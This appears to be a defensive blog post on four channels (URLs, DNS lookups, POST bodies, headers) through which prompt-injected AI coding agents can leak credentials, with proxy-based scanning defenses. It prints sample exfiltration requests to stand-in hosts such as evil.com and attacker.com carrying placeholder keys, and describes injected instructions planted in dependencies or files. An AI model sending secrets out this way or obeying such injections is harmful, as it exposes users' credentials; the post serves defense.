AI coding agents like Claude Code, Cursor, and Windsurf read your environment variables, config files, and source code. They also make HTTP requests to install packages, call APIs, and fetch documentation. That means they have both your secrets and a network connection.

A prompt injection hidden in a dependency, a tool response, or even a markdown file can tell the agent to include your credentials in its next outbound request. The agent doesn't know anything is wrong because the instruction looks like a normal task.

This creates four distinct exfiltration channels. Each one works differently and requires a different defense.

Channel 1: URLs

The simplest attack. The injection tells the agent to request a URL with the secret embedded:

GET https://evil.com/collect?key=AKIAIOSFODNN7EXAMPLE

The secret is in the query string or path. Any proxy or network monitor that inspects URLs can catch this with pattern matching. Regex for known secret formats (AWS keys, GitHub tokens, API keys) flags the request before it leaves the network.

Defense: URL-level DLP scanning on a forward proxy. This is the most widely implemented layer. Most agent security tools cover it.

Gap: Only catches secrets that appear in the URL itself. Attackers who know URL scanning exists will use one of the other three channels.

Channel 2: DNS Queries

This one is subtle. The injection tells the agent to request https://sk-ant-XXXXX.attacker.com/ping. Before the HTTP request even starts, the agent's HTTP client resolves the hostname. That DNS query hits the attacker's nameserver:

sk-ant-api03-abc123def456.attacker.com. IN A

The attacker sees the full subdomain in their query log. The secret is exfiltrated via DNS, not HTTP. No request body, no query parameter, no HTTP traffic at all. Just a DNS lookup.

Defense: DLP scanning must run before DNS resolution. If the proxy resolves the hostname first (which most do), the secret is already gone. The scan ordering matters: pattern match first, then resolve.

Gap: Most proxy tools resolve DNS before applying security rules. This channel is invisible to anything that scans URLs after the connection is established. DNS-over-HTTPS makes it even harder to intercept.

Channel 3: POST Bodies

The agent calls an API with your credentials embedded in the JSON body:

POST https://api.legitimate-service.com/v1/notes
Content-Type: application/json

{"title": "config", "body": "AKIAIOSFODNN7EXAMPLE"}

The URL is clean. The hostname might even be on an allowlist. Every URL-level scanner sees a legitimate API call and lets it through. The secret is in the request body, which URL scanning never touches.

This also works with form-encoded data, multipart file uploads (the secret can be in the filename), and any other content type. Agents make POST requests constantly, so this is indistinguishable from normal behavior.

Defense: Request body DLP scanning. The proxy buffers the body, extracts text strings from JSON, form fields, and multipart parts, then runs the same secret patterns against the extracted text. Fail-closed on parse errors (if you can't read it, block it).

Gap: HTTPS traffic through forward proxies uses CONNECT tunnels, which are encrypted. The proxy sees the hostname but not the body. Full body scanning requires either TLS interception (MITM with a trusted CA cert) or routing requests through a fetch endpoint that makes the request on the agent's behalf.

Channel 4: HTTP Headers

The agent sets a custom header with your credential:

GET https://api.example.com/data
Authorization: Bearer sk-ant-api03-abc123def456
X-Debug-Token: ghp_ABCDEFghijklmnopQRSTUVWXyz0123456789

This is the sneakiest channel because agents set authorization headers on every API call. A legitimate Authorization: Bearer <token> header to api.openai.com is correct usage. The same header to evil.com is exfiltration. And an agent sending your OpenAI key to a different service is a gray area that pure DLP can't easily distinguish.

Defense: Header DLP scanning. Scan at minimum the known credential-carrying headers (Authorization, Cookie, X-Api-Key). More aggressive mode: scan all headers including header names (secrets can be encoded as custom header names like X-AKIA1234).

Gap: Same CONNECT tunnel limitation as body scanning. Also, legitimate API calls send real credentials in headers. Allowlisting specific keys for specific destinations helps, but it's configuration-heavy and doesn't scale automatically.

What's Actually Available

The security tooling for AI agents is young. Here's what exists today for each channel:

ChannelDefenseTooling Status
URLURL-level DLP on proxyCovered by most agent security tools
DNSPre-resolution DLP scanningRare. Requires scan ordering awareness
POST bodyRequest body DLPEmerging. Limited by CONNECT tunnels
HeadersHeader DLP scanningEmerging. Legitimate-use false positives

The common pattern across all four: a forward proxy sits between the agent and the internet, scanning outbound traffic for known secret patterns. The difference is what it scans (URL only vs. URL + DNS + body + headers) and when it scans (before or after DNS resolution).

Open source options include Pipelock (scans all four channels, though body and header scanning is limited to plaintext proxy traffic until TLS interception lands). Commercial offerings from Protect AI, Lasso Security, and others are entering the space. The OWASP Top 10 for LLM Applications maps these attacks under "Sensitive Information Disclosure" and has a useful framework for thinking about the risk.

There's also a channel outside HTTP worth mentioning: MCP (Model Context Protocol) tool calls. When agents use MCP servers, the tool arguments are a separate data path. An agent can pass your credentials as a tool argument, and the MCP server forwards them wherever it wants. Scanning MCP tool inputs for secrets requires wrapping the MCP server with an inspection layer, which is architecturally different from HTTP proxy scanning but solves the same problem.

What's Still Unsolved

Even with all four HTTP channels covered, some exfiltration techniques remain hard to stop:

The fundamental tension: AI agents need network access and credential access to do their jobs. Removing either one makes them useless. The security challenge is monitoring the intersection without breaking the workflow.

What You Can Do Now

If you're running AI coding agents with access to production credentials:

  1. Route agent traffic through a proxy. Even basic URL scanning is better than nothing. Set HTTPS_PROXY and HTTP_PROXY in the agent's environment.
  2. Audit what your agent can see. Check which environment variables, config files, and secrets are accessible. Remove what the agent doesn't need.
  3. Allowlist outbound domains. If your agent only needs api.anthropic.com, registry.npmjs.org, and github.com, don't let it talk to anything else.
  4. Watch for the less obvious channels. URL scanning alone is not enough. DNS, bodies, and headers are where the next generation of attacks will land.

The agent security space is moving fast. The attacks are well-documented, the defenses are catching up, and the gap between the two is where real damage happens.